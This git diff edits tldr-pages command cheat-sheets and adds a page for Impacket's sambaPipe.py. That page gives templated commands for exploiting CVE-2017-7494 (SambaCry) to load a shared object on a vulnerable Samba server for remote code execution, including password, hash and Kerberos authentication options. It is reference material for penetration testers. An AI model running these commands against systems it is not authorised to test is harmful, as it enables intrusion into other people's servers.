diff --git a/tldr/cisco-ios/login b/tldr/cisco-ios/login index b638e286..ebc54fac 100644 --- a/tldr/cisco-ios/login +++ b/tldr/cisco-ios/login @@ -5,7 +5,7 @@ source: https://github.com/tldr-pages/tldr.git --- # login -> Manage line transport protocols. +> Manage console and virtual line authentication. > Accessed in configuration mode under `line`. > More information: . diff --git a/tldr/doas b/tldr/doas index d7b33606..6dd20a45 100644 --- a/tldr/doas +++ b/tldr/doas @@ -5,7 +5,7 @@ source: https://github.com/tldr-pages/tldr.git --- # doas -> Executes a command as another user. +> Execute a command as another user. > More information: . - Run a command as root: @@ -22,7 +22,7 @@ source: https://github.com/tldr-pages/tldr.git - Parse a configuration file and check if the execution of a command as another user is allowed: -`doas -C {{config_file}} {{command}}` +`doas -C {{path/to/config_file}} {{command}}` - Make `doas` request a password even after it was supplied earlier: diff --git a/tldr/impacket-sambapipe b/tldr/impacket-sambapipe new file mode 100644 index 00000000..f2b539b0 --- /dev/null +++ b/tldr/impacket-sambapipe @@ -0,0 +1,12 @@ +--- +syntax: markdown +tags: [tldr, common] +source: https://github.com/tldr-pages/tldr.git +--- +# impacket-sambaPipe + +> This command is an alias of `sambaPipe.py`. + +- View documentation for the original command: + +`tldr sambaPipe.py` diff --git a/tldr/okular b/tldr/okular index 9241f4a6..6dd61b25 100644 --- a/tldr/okular +++ b/tldr/okular @@ -18,7 +18,7 @@ source: https://github.com/tldr-pages/tldr.git - Open a document at a specific page: -`okular --page {{page_number}} {{path/to/file}}` +`okular {{[-p|--page]}} {{page_number}} {{path/to/file}}` - Open a specific document in presentation mode: diff --git a/tldr/sambapipe.py b/tldr/sambapipe.py new file mode 100644 index 00000000..534bfa88 --- /dev/null +++ b/tldr/sambapipe.py @@ -0,0 +1,29 @@ +--- +syntax: markdown +tags: [tldr, common] +source: https://github.com/tldr-pages/tldr.git +--- +# sambaPipe.py + +> Exploit CVE-2017-7494 (SambaCry) to upload and load a shared object (SO) file on a vulnerable Samba server for remote code execution. +> More information: . + +- Upload and load a shared object file on a vulnerable Samba server: + +`sambaPipe.py -so {{path/to/file.so}} {{domain}}/{{username}}:{{password}}@{{target}}` + +- Authenticate using NTLM hashes instead of a password: + +`sambaPipe.py -so {{path/to/file.so}} -hashes {{LM_HASH:NT_HASH}} {{domain}}/{{username}}:{{password}}@{{target}}` + +- Use Kerberos authentication for the target: + +`sambaPipe.py -so {{path/to/file.so}} -k -no-pass {{domain}}/{{username}}:{{password}}@{{target}}` + +- Specify a domain controller IP for authentication: + +`sambaPipe.py -so {{path/to/file.so}} -dc-ip {{dc_ip}} {{domain}}/{{username}}:{{password}}@{{target}}` + +- Use a custom port for the SMB connection: + +`sambaPipe.py -so {{path/to/file.so}} -port {{port}} {{domain}}/{{username}}:{{password}}@{{target}}`